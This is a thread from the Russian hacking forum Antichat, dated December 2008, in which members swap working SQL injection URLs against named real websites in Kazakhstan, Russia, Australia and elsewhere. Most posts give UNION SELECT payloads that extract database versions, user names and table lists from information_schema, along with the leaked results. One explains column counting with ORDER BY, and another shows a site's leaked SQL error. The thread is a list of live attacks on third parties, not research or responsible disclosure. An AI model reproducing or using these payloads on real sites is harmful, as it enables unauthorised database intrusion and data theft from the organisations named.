ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7221  
Старый 28.12.2008, 19:11
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Цитата:
Сообщение от Gemini12  
http://presscenter.kz/index.php?show=news&id=1+union+select+1,2,3,4,5--

нихера не понял...
Код:
http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+CONCAT(0x3a,Version(),0x3a),2,3,4,5,6,7,8,9/*
Version() - 5.0.19
Database() - presscenter


Код:
http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+table_name,2,3,4,5,6,7,8,9+from+information_schema.tables+limit+17,1/*

Последний раз редактировалось R1dex; 28.12.2008 в 19:14..
 
Ответить с цитированием

  #7222  
Старый 28.12.2008, 19:46
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
Отправить сообщение для F4R с помощью ICQ
По умолчанию

как ты определил что в начале до 9-ти нао перебирать там ведь хоть до 999 перебери надпись не меняетя!
 
Ответить с цитированием

  #7223  
Старый 28.12.2008, 19:51
masternet
Участник форума
Регистрация: 18.05.2008
Сообщений: 130
Провел на форуме:
1113633

Репутация: 155
По умолчанию

Цитата:
Сообщение от F4R  
как ты определил что в начале до 9-ти нао перебирать там ведь хоть до 999 перебери надпись не меняетя!
а ты уверен?ты встречался со скулями где например вместо ошибки надпись "Хакинг атемптинг" или тому подобного..
так же и здесь..это не стандартная скуля..
а цифра один экранируется в ошибке..
----
Germani если есть разница вывода то скуля(т.е. если на 1 есть надпись,а на 999 нет,или наоборот)

Последний раз редактировалось masternet; 28.12.2008 в 20:07..
 
Ответить с цитированием

  #7224  
Старый 28.12.2008, 19:59
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

Да кстати! Я встречался с такими, на ntu.kz, в случае хоть малейшей пробы на скулю, пишет что-то вроди: "Hacker's attack attempt, admin was informed"
 
Ответить с цитированием

  #7225  
Старый 28.12.2008, 20:27
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

"Компания АМТЭЛ. С первых дней основным видом деятельности компании являются сетевые проекты, поставка серверов и систем высшего класса отказоустойчивости..."

Код:
http://www.amtel.ru/page.php?id=-1+union+select+version()/*
Цитата:
Сообщение от F4R  
как ты определил что в начале до 9-ти нао перебирать там ведь хоть до 999 перебери надпись не меняетя!
Код:
http://presscenter.kz/index.php?show=news&id=-1+order+by+10/*
Код:
http://presscenter.kz/index.php?show=news&id=-1+order+by+9/*
 
Ответить с цитированием

  #7226  
Старый 28.12.2008, 21:40
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

http://www.izba.kz/ru/pages/index.php?id=-1+union+select+1,2,3,4,5,6,version(),8,user(),10,1 1,12,13,14,15,16,17,18,19,20--

4.1.22-STANDARD
siteis_user@localhost
 
Ответить с цитированием

  #7227  
Старый 28.12.2008, 22:39
Gemini12
Познающий
Регистрация: 24.12.2008
Сообщений: 54
Провел на форуме:
253038

Репутация: 9
Отправить сообщение для Gemini12 с помощью ICQ
По умолчанию

http://www.suncar.kz/index.php?id=1+union+select+unhex(hex(concat(table _name))),database(),version(),user()+from+informat ion_schema.tables--
 
Ответить с цитированием

  #7228  
Старый 28.12.2008, 23:28
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.readplus.com.au/blog_detail.php?id=239+union+select+1,version(),3,4,5,6,7,8,9/*
4.1.22-standard

Код:
http://www.egd.com/pages/blog_detail.php?id=-11+union+select+1,2/*
Код:
http://www.publicaffairsnetworking.com/blog_detail.php?id=-29+union+select+1,version(),3,4,5,6/*
5.0.45

Код:
http://hddvdmovieguide.com/blog_detail.php?id=-64+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16/*
4.1.22-standard

Код:
http://www.dvdmovieguide.com/blog_detail.php?id=-10+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16/*
4.1.22-standard

Код:
http://www.visitmaldives.com/ru/Where_to_stay/cruise-boat.php?id=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
4.1.22-standard

Код:
http://nauticaseychelles.com/boat.php?id=-37+union+select+1,version(),3,4,5,6/*
4.1.22-standard-log

Код:
http://www.pelicanmarine.com.au/boat.php?ID=-1018+union+select+1,version(),3,4,5,6,7,8,9,10/*
4.1.22-standard 3

Код:
http://www.gosail.com/boat.php?display=-29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46--
5.0.67-community

Код:
http://www.mclayboats.co.nz/boat.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
4.0.27-standard-log

Последний раз редактировалось faza02; 28.12.2008 в 23:30..
 
Ответить с цитированием

  #7229  
Старый 28.12.2008, 23:45
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167

Репутация: 100
По умолчанию

не очень люблю выкладывать линки.. не удержался.
Сайт посвящен php программированию. Типа php.net
http://www.phpbuddy.com/article.php?id=-1+union+select+1,2,3,4,5,6/*
phpbud22_phpbudd@localhost_4.1.21-standard
 
Ответить с цитированием

  #7230  
Старый 29.12.2008, 01:41
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Innatack.Ru
Только в опере почему то отображается .... хз почему..
http://www.inattack.ru/program/662.html'


В самом низу страницы, и в соурсе внизу -
Цитата:
<!--select url, name from linkobmen where url_list LIKE ('%/program/662.html'%') and datedo >1230500502 /// You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and datedo >1230500502' at line 1--><center><font color=red size=4>Ошибка БД (2)</
Пробовал раскручивать - не идет что то.. может фейк?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ